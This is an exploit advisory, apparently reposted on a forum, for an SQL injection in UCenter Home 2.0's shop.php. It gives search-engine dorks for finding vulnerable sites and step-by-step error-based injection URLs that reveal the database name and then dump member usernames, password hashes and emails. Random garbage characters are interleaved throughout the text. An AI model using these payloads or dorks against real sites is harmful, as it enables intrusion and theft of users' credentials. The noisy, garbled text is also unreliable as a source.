b @# ~( k6 U( h% Q( Q4 s8 V, ~__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
! [9 |% {! w d
+ F k+ Q" X+ p; Z" k" T ! _9 S" g) Z2 T4 i
$ B' g0 [. z; l3 y) k! E*/ Author : KnocKout
5 I$ y: D. M- ~* }, e; D: s2 @
* a% x* o) \/ D# P5 i. u; _) Z*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers R$ M+ o# R `& |( h; O9 X: ^
' g9 B" c# _; A1 I
*/ Contact: knockoutr@msn.com
& u! Z, A/ y: F. I; m8 j# t9 D: }0 w0 [. M M9 y& A& R
*/ Cyber-Warrior.org/CWKnocKout + t# C# v" u+ v, z
9 g4 P8 q" D: u. Q5 I2 j' X4 k__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 8 s* G* l+ f, m1 u
' H2 ^' P( u- @1 r% j C
Script : UCenter Home
. R6 g5 U3 q% L6 e. ^1 Y& o( b2 l {2 \* i7 J9 H H, j: j$ |
Version : 2.0 . i \2 I8 V8 U& D* }( f
. p' |' e& J( F5 ]3 zScript HomePage : http://u.discuz.net/
1 V$ E7 T/ N1 t4 d& f0 U/ [4 T
O1 F# ^3 _2 q8 w* f- F__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
6 b9 p7 Y% \9 X# ~9 I* _& n) B5 T4 h: I3 y9 ?
Dork : Powered by UCenter inurl:shop.php?ac=view ) g4 }. J. N y& Z1 D
/ k7 ~# Z. u4 J6 ~. |% f {8 x
Dork 2 : inurl:shop.php?ac=view&shopid= , u; R9 G0 V2 q! j. A
f: }- ]. {: C; L) L0 H% ]/ D( S; T) S__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) v- @% e/ w' d. l0 y. [. a* U+ r- o' N$ X* I( M
Vuln file : Shop.php
2 N. b. b5 a2 p. m
0 r! V2 Z! X( g! T1 r fvalue's : (?)ac=view&shopid=
3 S8 Q0 Y# t" j$ @. e1 a U
3 \& a& F, A, h. XVulnerable Style : SQL Injection (MySQL Error Based) - \+ V0 H2 ^6 a) P5 c
7 f" M. D$ G4 f% f4 h T, O4 ]Need Metarials : Hex Conversion
$ N- G" p {# {. Q5 H: [# y; F
" t, j, u( G0 r1 B__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== : ^4 V. w7 P4 A4 t! B% K7 l
1 \0 c0 b1 t( M) j. @, IYour Need victim Database name.
- q0 \' u" Z2 G, C
/ n6 I% v; e3 |# l0 h# x rfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 . X- c3 d( I4 @- Z
$ x6 F" f% w& \4 c; G.. $ A( h" w% p8 j; C$ V+ b
3 U, S3 n1 M4 o z: v" h
DB : Okey. * _1 m; f" i! ^
3 T; ~* G4 b1 ?9 C) `3 t- m( T8 f
your edit DB `[TARGET DB NAME]`
- E8 {: w* p- ]& N- g/ k" K: `& s( R! L+ K- k) E3 {
Example : 'hiwir1_ucenter'
+ Y, o7 e3 K8 @$ c; K- L8 Y
6 j+ ~* l8 A6 d. n( E9 \8 x3 z/ [( wEdit : Okey.
8 Y2 ~1 z& g! S4 S
8 m; x: [8 c. SYour use Hex conversion. And edit Your SQL Injection Exploit..
" M8 j; p+ |- e. G$ B0 k
/ ?: k6 _* }. }3 f: @ 5 e0 @6 r/ p, G$ {! U
+ \% i& E- b/ R4 D; O% xExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
6 O3 `- M. F8 _/ i* j, O5 l |
发表于 2013-2-27 21:31:31
收藏
支持
反对